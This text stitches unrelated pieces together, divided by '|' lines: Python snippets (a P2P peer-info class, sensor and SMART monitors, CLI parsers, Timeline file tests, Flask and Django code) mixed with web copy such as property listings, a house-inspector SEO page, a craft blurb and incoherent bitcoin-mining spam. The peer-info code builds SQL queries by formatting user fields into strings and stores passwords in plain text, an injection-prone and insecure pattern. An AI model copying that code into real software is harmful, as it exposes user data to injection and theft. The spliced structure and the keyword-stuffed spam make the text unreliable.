"""Constructor"""
self.ID = None
self.Type = PEER_TYPE # normal peer by default
self.Username = ''
self.Password = ''
self.Email = ''
self.CipheredPublicKeyHash = None
self.AuthToken = None
self.local_ip = ''
self.internet_ip = ''
self.is_registered = False
self.is_logged_in = False
self.get_local_ip()
self.get_internet_ip()
def load_from_db(self):
rs = g_db_helper.select('select * from peer_info')
if not rs:
g_logger.info("No peer info in db.")
else:
if len(rs) > 1:
g_logger.warning("More than one record in user_info. " \
"Use the first one.")
g_logger.debug(rs[0])
self.ID = rs[0][0]
self.Username = rs[0][1]
self.Password = rs[0][2]
self.Email = rs[0][3]
self.CipheredPublicKeyHash = rs[0][4]
self.Type = rs[0][5]
self.is_registered = True
def save_to_db(self):
if self.is_registered:
sql_str = "insert or replace into peer_info values " \
"('%s', '%s', '%s', '%s', '%s', %d)" % \
(self.ID, self.Username, self.Password, self.Email,
self.CipheredPublicKeyHash, self.Type)
g_logger.info("[save_to_db]:save %s into DB"%sql_str)
g_db_helper.execute(sql_str)
g_db_helper.commit()
def clear_db(self):
g_db_helper.execute("delete from peer_info")
g_db_helper.commit()
def get_local_ip(self):
from socket import socket, SOCK_DGRAM, AF_INET
ip_urls = ["www.google.com", "www.baidu.com"]
for each in ip_urls:
try:
s = socket(AF_INET, SOCK_DGRAM)
s.settimeout(3)
s.connect((each, 0))
ip = s.getsockname()[0]
self.local_ip = ip
#print(each, ip)
break
except:
pass
def get_internet_ip(self):
from twisted.web.client import getPage
ip_urls = ["http://whereismyip.com/", "http://www.whereismyip.org/",
"http://myip.eu/"]
for each in ip_urls:
getPage(each).addCallback(self._handle_get_internet_ip)
def _handle_get_internet_ip(self, data):
import re
if re.search('\d+\.\d+\.\d+\.\d+', data) == None:
return
ip = re.search('\d+\.\d+\.\d+\.\d+', data).group(0)
#print(data, ip)
self.internet_ip = ip
if __name__ == "__main__":
pi = PeerInfo()
pi.load_from_db()
|
Check out what inspired each book!
Follow Emma Locke’s board The Trouble With Being Wicked on Pinterest.
Follow Emma Locke’s board The Problem With Seduction on Pinterest.
Follow Emma Locke’s board A Game of Persuasion on Pinterest.
Follow Emma Locke’s board The Art of Ruining a Rake on Pinterest.
Follow Emma Locke’s board The Cheer in Charming an Earl on Pinterest.
|
"""
.. module:: sensors
:platform: unix
:synopsis: Provides checks for system sensors and SMART devices
.. moduleauthor:: Colin Alston <colin@imcol.in>
"""
import os
from zope.interface import implementer
from twisted.internet import defer
from duct.interfaces import IDuctSource
from duct.objects import Source
@implementer(IDuctSource)
class Sensors(Source):
"""Returns hwmon sensors info
Note: There is no transformation done on values, they may be in
thousands
**Metrics:**
:(service name).(adapter).(sensor): Sensor value
"""
def _find_sensors(self):
path = '/sys/class/hwmon'
sensors = {}
# Find adapters
if os.path.exists(path):
monitors = os.listdir(path)
for hwmons in monitors:
mon_path = os.path.join(path, hwmons)
name_path = os.path.join(mon_path, 'name')
if os.path.exists(name_path):
with open(name_path, 'rt') as name_file:
name = name_file.read().strip()
else:
name = None
if name not in sensors:
sensors[name] = {}
sensor_map = {}
# Find sensors in this adapter
for mon_file in os.listdir(mon_path):
if mon_file.startswith('temp') or mon_file.startswith(
'fan'):
tn = mon_file.split('_')[0]
sensor_path = os.path.join(mon_path, mon_file)
if tn not in sensor_map:
sensor_map[tn] = [None, 0]
if mon_file.endswith('_input'):
with open(sensor_path, 'rt') as value_file:
value = int(value_file.read().strip())
if mon_file.startswith('temp'):
value = value / 1000.0
sensor_map[tn][1] = value
if mon_file.endswith('_label'):
with open(sensor_path, 'rt') as value_file:
sensor_name = value_file.read().strip()
sensor_map[tn][0] = sensor_name
for sensor_name, value in sensor_map.values():
if sensor_name:
filtered_name = sensor_name.lower().replace(' ', '_')
sensors[name][filtered_name] = value
return sensors
def get(self):
sensors = self._find_sensors()
events = []
for adapter, v in sensors.items():
for sensor, val in v.items():
events.append(
self.createEvent('ok',
'Sensor %s:%s - %s' % (
adapter, sensor, val),
val,
prefix='%s.%s' % (adapter, sensor,)))
return events
@implementer(IDuctSource)
class LMSensors(Source):
"""Returns lm-sensors output
This does the exact same thing as the Sensors class but uses lm-sensors.
**Metrics:**
:(service name).(adapter).(sensor): Sensor value
"""
ssh = True
@defer.inlineCallbacks
def _get_sensors(self):
out, _err, code = yield self.fork('/usr/bin/sensors')
if code == 0:
defer.returnValue(out.strip('\n').split('\n'))
else:
defer.returnValue([])
def _parse_sensors(self, sensors):
adapters = {}
adapter = None
for i in sensors:
l = i.strip()
if not l:
continue
if ':' in l:
n, v = l.split(':')
vals = v.strip().split()
if n == 'Adapter':
continue
if '\xc2\xb0' in vals[0]:
val = vals[0].split('\xc2\xb0')[0]
elif len(vals) > 1:
val = vals[0]
else:
continue
val = float(val)
adapters[adapter][n] = val
else:
adapter = l
adapters[adapter] = {}
return adapters
@defer.inlineCallbacks
def get(self):
sensors = yield self._get_sensors()
adapters = self._parse_sensors(sensors)
events = []
for adapter, v in adapters.items():
for sensor, val in v.items():
events.append(
self.createEvent('ok',
'Sensor %s:%s - %s' % (
adapter, sensor, val),
val,
prefix='%s.%s' % (adapter, sensor,)))
defer.returnValue(events)
@implementer(IDuctSource)
class SMART(Source):
"""Returns SMART output for all disks
**Metrics:**
:(service name).(disk).(sensor): Sensor value
"""
ssh = True
def __init__(self, *a, **kw):
Source.__init__(self, *a, **kw)
self.devices = []
@defer.inlineCallbacks
def _get_disks(self):
out, _err, code = yield self.fork('/usr/sbin/smartctl',
args=('--scan',))
if code != 0:
defer.returnValue([])
out = out.strip('\n').split('\n')
devices = []
for ln in out:
if '/dev' in ln:
devices.append(ln.split()[0])
defer.returnValue(devices)
@defer.inlineCallbacks
def _get_smart(self, device):
out, _err, code = yield self.fork('/usr/sbin/smartctl',
args=('-A', device))
if code == 0:
defer.returnValue(out.strip('\n').split('\n'))
else:
defer.returnValue([])
def _parse_smart(self, smart):
mark = False
attributes = {}
for l in smart:
ln = l.strip('\n').strip()
if not ln:
continue
if mark:
(_id, attribute, _flag, _val, _worst, _thresh, _type, _u, _wf,
raw) = ln.split(None, 9)
try:
raw = int(raw.split()[0])
attributes[attribute.replace('_', ' ')] = raw
except:
pass
if ln[:3] == 'ID#':
mark = True
return attributes
@defer.inlineCallbacks
def get(self):
if not self.devices:
self.devices = yield self._get_disks()
events = []
for disk in self.devices:
smart = yield self._get_smart(disk)
stats = self._parse_smart(smart)
for sensor, val in stats.items():
events.append(
self.createEvent('ok',
'Attribute %s:%s - %s' % (
disk, sensor, val),
val,
prefix='%s.%s' % (disk, sensor,))
)
defer.returnValue(events)
|
The condor unit helps Dorot´s customer all over the world to control remotely hydraulic valves and optimize their performance.
Thanks to its advanced control algorithm, customer can monitor performance of valves and changes settings remotely.
ConDor offers unlimited control functions, giving you the ability to create and change any valve applications and configure its functions freely.
|
# -*- coding: utf-8 -*-
import argparse
"""Description of arguments of command line interface"""
def create_parser():
"""Create command line arguments parser"""
parser = argparse.ArgumentParser(description='Helicon Zoo command line')
# print settings from settings.yaml
parser.add_argument('--get-settings', action='store_true', help='get current settings')
# write settings to settings.yaml
parser.add_argument('--set-settings', dest="set_settings", nargs="+", help='set settings')
# set urls of additional feeds
parser.add_argument('--feed-urls', dest='urls', nargs='*', default='', help='feed urls to load')
# print installed products
parser.add_argument('--list-installed', action='store_true', dest='show_installed',
help='show all installed programs')
# print installed products
parser.add_argument('--run-tests', action='store_true', dest='run_test',
help='run tests over software')
# print all products
parser.add_argument('--list', action='store_true', dest='list_products',
help='list latest versions of all available products')
# custom settings path
parser.add_argument('--settings', dest='settings', default=None, help='search the settings in custom directory')
# custom data dir
parser.add_argument('--data-dir', dest='data_dir', default=None, help='default data directory')
# search products
parser.add_argument('--search', dest='search', help='search products for name and descriptions')
# search installed products and write they to current.yaml
parser.add_argument('--sync', action='store_true', dest='sync', help='synchronize installed version of products from system')
# set products to install pr uninstall
parser.add_argument('--products', dest='products', nargs="*", help='product names to install/uninstall')
# make intstall
parser.add_argument('--install', dest='install', action='store_true', help='install of specified products')
# set install parameters for products to install
parser.add_argument('--parameters', dest='parameters', nargs="?", help="application install parameters\n\
Format: --parameters param1=val1 product2@param2=val2 ...")
# set install parameters for products to install
parser.add_argument('-pj', '--data-parameters-json',
dest='json_params',
nargs="?",
help="install with parameters in file json format")
# set install parameters for products to install
parser.add_argument('-py', '--data-parameters',
dest='yml_params',
nargs="?",
help="install with parameters in file yaml format")
# make uninstall
parser.add_argument('--uninstall', action='store_true', dest='uninstall', help='uninstall a program')
# quit mode
parser.add_argument('-q', '--quiet', action='store_true', dest='quiet', default=False,
help='don\'t print anything to stdout')
# allow communicate with user during install process
parser.add_argument('-i', '--interactive', action='store_true', dest='interactive', default=False,
help='allow to ask install parameters if needed')
# ignore any errors
parser.add_argument('-f', '--force', action='store_true', dest='force', default=False, help='ignore exit code')
# set log level
parser.add_argument('--log-level', dest='log_level', default=None,
help='set log level (debug, warning, info, error, critical)')
# start ui web server
parser.add_argument('--run-server', dest='run_server', action='store_true', help='run web ui at http://localhost:7799/')
# set ui server port
parser.add_argument('--run-server-addr', dest='run_server_addr', default='7799', help='bind web ui server to "addr:port" or port')
# start install/unstall task
parser.add_argument('--start-install-worker', dest='worker_task_id', type=int, help='start supervisour worker')
parser.add_argument('-l', '--task-log', dest='task_log',
nargs="?", default=None,
help='specify log for task if not specified will print to stdout')
parser.add_argument('--task-work', dest='task_id', type=int, help='start installer worker with task by id')
# compile zoo feed from dest to src
parser.add_argument('--compile-repository', nargs=2, dest="zoo_compile",
help='compile zoo feed, first agrument src feed directory, second destination feed ')
return parser
|
Advancements in Medical technology have given us new ways to create our families. In many instances, the law has not kept pace with the science. We want to make sure that you and your children are protected.
|
"""
Magically manipulate and return the doge image.
"""
from math import floor
import numpy as np
from PIL import Image
from colorsys import rgb_to_hls, hls_to_rgb
LIGHT = (172, 143, 239)
DARK = (134, 30, 214)
def scrub_rgb(c):
return (int(floor(c[0] * 255)),
int(floor(c[1] * 255)),
int(floor(c[2] * 255)))
def get_color_pallete(c):
"""
Given a color c(rgb) return a new dark and light color(rgb).
"""
hls_d = rgb_to_hls(c[0]/255., c[1]/255., c[2]/255.)
# Magic numbers are the diff from hls(DARK) and hls(LIGHT).
hls = (hls_d[0] - 0.04385, hls_d[1] + 0.27059, hls_d[2])
new_dark = scrub_rgb(hls_to_rgb(hls_d[0], hls_d[1], hls_d[2]))
new_light = scrub_rgb(hls_to_rgb(hls[0], hls[1], hls[2]))
return new_light, new_dark
class ImageManager(object):
"""
Manages the doge template and does the conversion.
"""
_light = LIGHT
_dark = DARK
def __init__(self, image=None, light=None, dark=None):
if light:
self._light = light
if dark:
self._dark = dark
if not image:
self._image = Image.open("doge.png").convert("RGB")
else:
self._image = image.convert("RGB")
self._data = np.array(self._image.convert("RGB"))
def put_color(self, c):
new_light, new_dark = get_color_pallete(c)
return self.put(new_light, new_dark)
def put(self, new_light, new_dark):
data = np.copy(self._data)
data[(data == LIGHT).all(axis=-1)] = new_light
data[(data == DARK).all(axis=-1)] = new_dark
return Image.fromarray(data, mode="RGB")
|
NEW PRICE! The classic appeal of the three-bedroom ‘Hampton’ lies in its spacious and carefully-planned layout. The living room opens into the garden, with a kitchen/dining room for sharing mealtimes, while an en-suite master bedroom and two further good-sized bedrooms are found upstairs. Home includes blinds throughout.
Abbey View features a stunning collection of 1 bedroom apartments, 2, 3, 4 and 5 bedroom homes located in the beautiful town of Farnham, Surrey.
The Wilton, a traditional 5 bedroom home is perfect for families looking for extra space. With an open-plan kitchen/dining area and a separate living room, there is space for everyone.
This traditional 4 bedroom home has been designed to suit growing families. The open-plan kitchen/dining area opens through double doors to the private rear garden.
This 3 bedroom home is perfect for young couples and growing families. With a large living room, separate kitchen/dining area and a study, there’s plenty of space for all.
A modern 3 bedroom home perfectly designed for people wanting to downsize. With a large living room and separate kitchen/dining area there’s plenty of space for all.
Pembroke Manor is a delightful collection of brand new 2 and 3 bedroom apartments located in the charming village of Hook.
NEW PRICE! Plot 5 is a wonderful 2 bedroom first floor apartment featuring an open plan kitchen/living/dining room and master bedroom with en suite shower room and second double bedroom offering thoughtful design perfectly suited for contemporary living.
Plot 34 is a wonderful 2 bedroom second floor apartment featuring an open plan kitchen/living/dining room and master bedroom with en suite shower room and a second double bedroom.
NEW PRICE! This third floor apartment features an open plan kitchen/living/dining room, en-suite to master bedroom, two storage cupboards to help free up space. With allocated parking space.
A beautiful collection of 2, 3, 4, 5 bedroom homes, located in the wonderful country setting of West End in Surrey. Only a short distance away from the village centre and the added luxury of fantastic transport links nearby.
Visit our 4 & 5 bedroom show homes to see what it could be like living in one of our homes.
Four bedroom detached home built for family life! With four bedrooms and plenty of living space throughout. We have schemes available to get you moving, call us to find out more! With garage & 2 parking spaces.
Three bedroom home available with Help to Buy*. Open plan kitchen/dining area , separate living room, master bedroom with en suite and 2 further bedrooms.
Home comes with fully integrated kitchen, electrolux appliances, flooring throughout, half height tile to wet rooms & turf to rear garden. Don't miss out! Garage & 2 parking spaces.
Open plan kitchen/dining area,separate living room, master bedroom with en suite and 2 further bedrooms. Call us to find out how we can help to get you moving.
STAMP DUTY PAID! The Crofton G is a classic townhouse with versatile living space over three storeys. The living/dining area extends across the full width of the house, ideal for entertaining and family living.
|
import argparse
from datetime import datetime, timedelta
import dateutil.relativedelta
from config import CONNECTION_STRING
from ingestion.etl import Etl
from ingestion.ingest import Ingest
CONNECTIONS_URL = 'http://graph.spitsgids.be/connections/?departureTime='
STATIONS_URL = 'https://irail.be/stations/NMBS'
FEEDBACK_URL = 'https://gtfs.irail.be/nmbs/feedback/occupancy-until-20161029.newlinedelimitedjsonobjects'
def valid_date(s):
try:
return datetime.strptime(s, "%Y-%m-%d")
except ValueError:
msg = "Not a valid date: '{0}'.".format(s)
raise argparse.ArgumentTypeError(msg)
parser = argparse.ArgumentParser(description='Parse ingest options')
# Switch
parser.add_argument('-w', '--wipe', action='store_const', const=True,
help='Wipe the database. Will drop all tables. Default is FALSE')
parser.add_argument('-f', '--forceIngest', action='store_const', const=True,
help="Don't skip existing ingest files. Default is FALSE")
parser.add_argument('-s', "--startDate", required=False, type=valid_date,
help="The Start Date - format YYYY-MM-DD. Default is 1 month ago.")
parser.add_argument('-e', "--endDate", required=False, type=valid_date,
help="The End Date - format YYYY-MM-DD. Default is now()")
parser.add_argument('-o', "--outputFolder", required=False,
help="The folder in which to store the files. Default is 'data/'")
args = parser.parse_args()
if args.endDate is not None:
END = args.endDate
else:
END = datetime.now()
END = END - timedelta(minutes=END.minute % 10, seconds=END.second, microseconds=END.microsecond)
if args.startDate is not None:
START = args.startDate
else:
START = END - dateutil.relativedelta.relativedelta(months=1)
WIPE = args.wipe if args.wipe is not None else False
FOLDER = args.outputFolder if args.outputFolder is not None else 'data'
FORCE_INGEST = args.forceIngest if args.forceIngest is not None else False
print "Ingesting from %s to %s. Initialize=%s" % (START, END, WIPE)
ingest = Ingest(CONNECTIONS_URL, STATIONS_URL, FEEDBACK_URL, START, END, FOLDER, FORCE_INGEST)
ingest.run()
etl = Etl(CONNECTION_STRING, FOLDER, WIPE)
etl.run()
|
By 2022, more than 4 in 10 employees around the world are expected to be mobile, according to Strategy Analytics. With an increasing need for workplace mobility, Acer has incorporated Gemalto miniaturized embedded SIM (eSIM) into its Swift 7 laptops to offer ultra-portable always-connected PCs that enable users to be connected on the go.
“With Gemalto’s proven expertise in eSIM deployment, the Acer Swift 7 can help professionals stay productive with flexible and seamless connectivity on the go,” said Jerry Hou, General Manager, Consumer Notebooks, IT Products Business, Acer. “Similar to smartphones, always-connected PCs such as Acer’s Swift 7 will get notifications and pull data without ever disconnecting. We are delighted to provide this seamless connectivity, which will in turn help organizations better serve the needs of the growing pool of mobile workers,” said Sashidhar Thothadri, senior vice president, Mobile Services & IOT Asia, Gemalto.
|
from utils import create_newfig, create_moving_line, create_still_segment, run_or_export
func_code = 'af'
func_name = 'test_line_line_touching'
def setup_fig01():
fig, ax, renderer = create_newfig('{}01'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 3), (2, 3), (3, -3), 'top')
create_still_segment(fig, ax, renderer, (3, 3), (5, 0), 'topright')
return fig, ax, '{}01_{}'.format(func_code, func_name)
def setup_fig02():
fig, ax, renderer = create_newfig('{}02'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 1), (2, 1), (1, 1), 'bot')
create_still_segment(fig, ax, renderer, (3, 2), (3, 3), 'right')
return fig, ax, '{}02_{}'.format(func_code, func_name)
def setup_fig03():
fig, ax, renderer = create_newfig('{}03'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 1), (2, 1), (2, 2), 'bot')
create_still_segment(fig, ax, renderer, (2, 3), (3, 3), 'top')
return fig, ax, '{}03_{}'.format(func_code, func_name)
def setup_fig04():
fig, ax, renderer = create_newfig('{}04'.format(func_code))
create_moving_line(fig, ax, renderer, (1, 1), (2, 1), (0, 2), 'bot')
create_still_segment(fig, ax, renderer, (2, 3), (3, 3), 'top')
return fig, ax, '{}04_{}'.format(func_code, func_name)
run_or_export(setup_fig01, setup_fig02, setup_fig03, setup_fig04)
|
This statement-making fascinator headband rises to the occasion with a twist mesh base, fluffy bouquet of flighty feathers all on an easy to wear headband with precision placement. This is a modern twist on the loved fascinator.... 18/12/2013 · In this episode of Maid At Home, Hannah Read-Baldrey shows you how to make a beautiful butterfly fascinator - perfect for the bride or a wedding guest!
How to Make a Princess Beatrice-Inspired Butterfly Fascinator How to Make an Ultra-Chic Fascinator Out of a Place Mat How to Make a Kate Middleton-Inspired Feather Fascinator... If you are willing to try and make a similar butterfly headband yourself you might want to purchase my .pdf tutorial on a lace butterfly made WITHOUT any special tools which is available from my Etsy shop.
If you are willing to try and make a similar butterfly headband yourself you might want to purchase my .pdf tutorial on a lace butterfly made WITHOUT any special tools which is available from my Etsy shop.
|
# Copyright (C) 2009, 2010, 2011 Rickard Lindberg, Roger Lindberg
#
# This file is part of Timeline.
#
# Timeline is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Timeline is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Timeline. If not, see <http://www.gnu.org/licenses/>.
import datetime
import unittest
from specs.utils import TmpDirTestCase
from timelinelib.db.backends.file import dequote
from timelinelib.db.backends.file import FileTimeline
from timelinelib.db.backends.file import quote
from timelinelib.db.backends.file import split_on_semicolon
from timelinelib.db.exceptions import TimelineIOError
from timelinelib.db.objects import TimePeriod
from timelinelib.drawing.viewproperties import ViewProperties
from timelinelib.time import PyTimeType
class FileTimelineSpec(TmpDirTestCase):
IO = True
def testCorruptData(self):
"""
Scenario: You open a timeline that contains corrupt data.
Expected result: You get an exception and you can not use the timeline.
"""
self.assertRaises(TimelineIOError, FileTimeline, self.corrupt_file)
def testMissingEOF(self):
"""
Scenario: A timeline is opened that contains no corrupt data. However,
no end of file marker is found.
Expected result: The timeline should be treated as corrupt.
"""
self.assertRaises(TimelineIOError, FileTimeline, self.missingeof_file)
def testAddingEOF(self):
"""
Scenario: You open an old timeline < 0.3.0 with a client >= 0.3.0.
Expected result: The timeline does not contain the EOF marker but since
it is an old file, no exception should be raised.
"""
FileTimeline(self._021_file)
def testInvalidTimePeriod(self):
"""
Scenario: You open a timeline that has a PREFERRED-PERIOD of length 0.
Expected result: Even if this is a valid value for a TimePeriod it
should not be a valid PREFERRED-PERIOD. The length must be > 0. So we
should get an error when trying to read this.
"""
self.assertRaises(TimelineIOError, FileTimeline,
self.invalid_time_period_file)
def testSettingInvalidPreferredPeriod(self):
"""
Scenario: You try to assign a preferred period whose length is 0.
Expected result: You should get an error.
"""
timeline = FileTimeline(self.valid_file)
now = datetime.datetime.now()
zero_tp = TimePeriod(PyTimeType(), now, now)
vp = ViewProperties()
vp.displayed_period = zero_tp
self.assertRaises(TimelineIOError, timeline.save_view_properties, vp)
def setUp(self):
TmpDirTestCase.setUp(self)
# Create temporary dir and names
self.corrupt_file = self.get_tmp_path("corrupt.timeline")
self.missingeof_file = self.get_tmp_path("missingeof.timeline")
self._021_file = self.get_tmp_path("021.timeline")
self.invalid_time_period_file = self.get_tmp_path("invalid_time_period.timeline")
self.valid_file = self.get_tmp_path("valid.timeline")
# Write content to files
HEADER_030 = "# Written by Timeline 0.3.0 on 2009-7-23 9:40:33"
HEADER_030_DEV = "# Written by Timeline 0.3.0dev on 2009-7-23 9:40:33"
HEADER_021 = "# Written by Timeline 0.2.1 on 2009-7-23 9:40:33"
self.write_timeline(self.corrupt_file, ["corrupt data here"])
self.write_timeline(self.missingeof_file, ["# valid data"])
self.write_timeline(self._021_file, [HEADER_021])
invalid_time_period = [
"# Written by Timeline 0.5.0dev785606221dc2 on 2009-9-22 19:1:10",
"PREFERRED-PERIOD:2008-12-9 11:32:26;2008-12-9 11:32:26",
"CATEGORY:Work;173,216,230;True",
"CATEGORY:Private;200,200,200;True",
"EVENT:2009-7-13 0:0:0;2009-7-18 0:0:0;Programming course;Work",
"EVENT:2009-7-10 14:30:0;2009-7-10 14:30:0;Go to dentist;Private",
"EVENT:2009-7-20 0:0:0;2009-7-27 0:0:0;Vacation;Private",
"# END",
]
self.write_timeline(self.invalid_time_period_file, invalid_time_period)
valid = [
"# Written by Timeline 0.5.0 on 2009-9-22 19:1:10",
"# END",
]
self.write_timeline(self.valid_file, valid)
def write_timeline(self, path, lines):
f = file(path, "w")
f.write("\n".join(lines))
f.close()
class FileTimelineQuuoteFunctionsSpec(unittest.TestCase):
def testQuote(self):
# None
self.assertEqual(quote("plain"), "plain")
# Single
self.assertEqual(quote("foo;bar"), "foo\\;bar")
self.assertEqual(quote("foo\nbar"), "foo\\nbar")
self.assertEqual(quote("foo\\bar"), "foo\\\\bar")
self.assertEqual(quote("foo\\nbar"), "foo\\\\nbar")
self.assertEqual(quote("\\;"), "\\\\\\;")
# Mixed
self.assertEqual(quote("foo\nbar\rbaz\\n;;"),
"foo\\nbar\\rbaz\\\\n\\;\\;")
def testDequote(self):
self.assertEqual(dequote("\\\\n"), "\\n")
def testQuoteDequote(self):
for s in ["simple string", "with; some;; semicolons",
"with\r\n some\n\n newlines\n"]:
self.assertEqual(s, dequote(quote(s)))
def testSplit(self):
self.assertEqual(split_on_semicolon("one;two\\;;three"),
["one", "two\\;", "three"])
|
Here at House Inspector Crew, we're ready to meet all your requirements when it comes to House Inspector in Saint Marys, PA. Our crew of experienced contractors can offer the expert services that you need with the most sophisticated technology available. Our products are of the highest quality and we can conserve your money. Give us a call by dialing 888-506-4448 to get started.
Lowering costs is a valuable part for your task. You still need excellent quality results with House Inspector in Saint Marys, PA, and you're able to put your confidence in our staff to conserve your funds while continually giving the very best quality work. We provide the best quality while still costing you less. Our ambition is to ensure you receive the highest quality materials and a finished project that lasts over time. As an example, we are very careful to keep clear of expensive complications, deliver the results efficiently to conserve time, and be sure you get the most effective prices on materials and work. Save time and funds by contacting House Inspector Crew now. We'll be waiting to accept your call at 888-506-4448.
It is important to be knowledgeable with regards to House Inspector in Saint Marys, PA. We won't encourage you to come up with imprudent choices, since we understand exactly what we'll be doing, and we ensure you know exactly what to expect with the work. We will take the unexpected surprises from the situation through providing precise and complete info. Begin by calling 888-506-4448 to discuss your task. We'll explore your concerns once you call us and get you arranged with an appointment. We consistently appear at the arranged hour, all set to work together with you.
Many good reasons exist to consider House Inspector Crew regarding House Inspector in Saint Marys, PA. Our equipment are of the very best quality, our cash saving solutions are realistic and powerful, and our client satisfaction scores will not be topped. We have the expertise you will want to meet all your objectives. If you need House Inspector in Saint Marys, call House Inspector Crew by dialing 888-506-4448, and we are going to be beyond pleased to help.
|
import click
import logging
import mondrian
from celery.bin.celery import CeleryCommand, command_classes
from flask import current_app
from flask.cli import FlaskGroup, with_appcontext
# XXX: Do not import any mereswine modules here!
# If any import from this module triggers an exception the dev server
# will die while an exception only happening during app creation will
# be handled gracefully.
def _create_app(info):
from .factory import make_app
return make_app()
def shell_ctx():
from .core import db
ctx = {'db': db}
ctx.update((name, cls) for name, cls in db.Model._decl_class_registry.items() if hasattr(cls, '__table__'))
return ctx
def register_shell_ctx(app):
app.shell_context_processor(shell_ctx)
@click.group(cls=FlaskGroup, create_app=_create_app)
@with_appcontext
def cli():
"""
This script lets you control various aspects of Mereswine from the
command line.
"""
logger = logging.getLogger()
mondrian.setup(excepthook=True)
logger.setLevel(logging.DEBUG if current_app.debug else logging.INFO)
@cli.group(name='db')
def db_cli():
"""DB management commands"""
pass
@db_cli.command()
def drop():
"""Drop all database tables"""
from .core import db
if click.confirm('Are you sure you want to lose all your data?'):
db.drop_all()
@db_cli.command()
def create():
"""Create database tables"""
from .core import db
db.create_all()
@db_cli.command()
def recreate():
"""Recreate database tables (same as issuing 'drop' and then 'create')"""
from .core import db
if click.confirm('Are you sure you want to lose all your data?'):
db.drop_all()
db.create_all()
@cli.command()
@click.option('--uuid', help="UUID of server to crawl")
def crawl(uuid):
"""Crawl all instances, or a given UUID if passed"""
from .crawler import crawl_instance, crawl_all
if uuid is not None:
crawl_instance(uuid)
else:
crawl_all()
@cli.command(context_settings={'ignore_unknown_options': True, 'allow_extra_args': True}, add_help_option=False)
@click.pass_context
def celery(ctx):
"""Manage the Celery task daemon."""
from .tasks import celery
# remove the celery shell command
next(funcs for group, funcs, _ in command_classes if group == 'Main').remove('shell')
del CeleryCommand.commands['shell']
CeleryCommand(celery).execute_from_commandline(['mereswine celery'] + ctx.args)
|
Bitcoin Mining Definition - Bitcoin mining is the process of creating, or rather discovering, bitcoin currency.Transactions Block Size Sent from addresses Difficulty Hashrate Price in USD Mining Profitability Sent in USD Avg.
Bitcoin Mining. 2.8K likes. Working with the latest technology we offer everyone an opportunity to have their own online crypto currency mine, based on.
Topic you have posted in Normal Topic Hot Topic (More than 21 replies) Very Hot Topic (More than 100 replies) Locked Topic Sticky Topic Poll.We make the process of acquiring Bitcoin or Altcoins fast and easy through the use of cloud mining.Interest in cryptocurrencies has surged as bitcoin skyrocketed in value.
Mine bitcoin with our desktop mining software for windows with a full user interface to make the process easier than ever.Easily find out the best cloud hashing sites site and provider.We offer top-of-the-line cryptocurrency mining hardware from the best global manufacturers. Genesis Mining is the largest and most trusted cloud Bitcoin mining provider in the world.Bitcoin is the first decentralized peer-to-peer payment network that is powered by its users with no central authority or middlemen.
The company attributes the increase to its semiconductor division which manufactures bitcoin mining chips and says that it expects the trend to continue.Disgruntled XRP Investor Hits Ripple with Class-Action Lawsuit.Our bitcoin and cryptocurrency mining guides will help you understand how mining works in the crypto space.Has easy-to-understand information on mining pools and useful tips.
Designed to make owning and circulating cryptocurrencies as easy.To form a distributed timestamp server as a peer-to-peer network, bitcoin uses a proof-of-work system.Pro HYIP provides a complete bitcoin mining script to start and manage a bitcoin program.
Mining software information, hardware, and bitcoin cloud mining basics.Find out what your expected return is depending on your hash rate and electricity cost.News, the Bitcoin community, innovations, the general environment.
While Bitcoin has become less of an outlier in recent months amid the rise of so-called alt-coins like EOS and Litecoin, the original still towers above its peers.View detailed information and charts on all Bitcoin transactions and blocks.
Investing in Cryptocurrency We are specializing in Bitcoin mining.A pie chart showing the hashrate distribution between the major bitcoin mining pools - Blockchain.
Find all you need to know and get started with Bitcoin on bitcoin.org.Bitcoin mining synonyms, Bitcoin mining pronunciation, Bitcoin mining translation, English dictionary definition of Bitcoin mining. n 1. a.We help you get the lowest cost per KWh on all Crypto mining rigs and miners across the globe with the top.This game allows you to test your skill at becoming a successful Bitcoin miner.MultiMiner is a desktop application for crypto-currency mining and monitoring on Windows, Mac OS X and Linux.
Copyright © 2017 Bitcoin mining what is. The WP Theme by Ben Alvele, Alvele.com.
|
__author__ = 'Vojda'
class User:
"""
This is the user class
"""
@classmethod
def from_dict(cls, object_dict):
return User(object_dict['username'], object_dict['password'], object_dict['admin'])
def __init__(self, username, password, admin=False):
self.username = username
self.password = password
self.admin = admin
def to_json(self):
return "{}"
class Recipe:
"""
Recipe class representing the recipes in the db
"""
@classmethod
def from_dict(cls, object_dict):
return Recipe(object_dict['name'], object_dict['products'], object_dict['description'], object_dict['checked'], object_dict['_id'])
def __init__(self, name, products, description, checked=False, idd=None):
self.name = name
self.products = products
self.description = description
self.checked = checked
self._id = idd
class Cookie:
"""
A cookie representation:
{"hash": "SOME HASH",
"Expires": miliseconds
}
"""
def __init__(self, hash, expires):
self.hash = hash
self.expires = expires
|
Established by social activists from diverse profession in 1992, the Cachar Cancer Hospital Society (CCHS) is a premier philanthropic and charitable not-for-profit NGO in North East India that is working to battle cancer. The society made humble start almost from scratch and relentlessly strived to develop essential infrastructure and establish and run a cancer detection and treatment centre at a place like Silchar, at the nerve centre of Barak Valley region. The first detection centre was started in a temporary rented room at NS Avenue, on January 23, 1993.
Surrounded by Mizoram, Manipur, Meghalaya, Bangladesh and Tripura, poor economic condition of the people, communication bottleneck, remote geographical locations, under-developed agriculture, industry and technology and more stood on the way of mobilization of financial resources necessary to develop a full –fledged Cancer Hospital and Research Centre. However, numerous people irrespective of cast, creed, religion and language came forward to help the society in its crusade against cancer.
|
from django.contrib.auth import login, logout
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.generic import (
FormView,
View,
)
from auth.forms import (
LoginForm,
RegisterForm,
)
class LoginRequiredMixin(object):
@method_decorator(login_required(redirect_field_name='redirect'))
def dispatch(self, *args, **kwargs):
return super(LoginRequiredMixin, self).dispatch(*args, **kwargs)
class AuthView(FormView):
def form_valid(self, form):
user = form.save()
login(self.request, user)
return super(AuthView, self).form_valid(form)
class LoginView(AuthView):
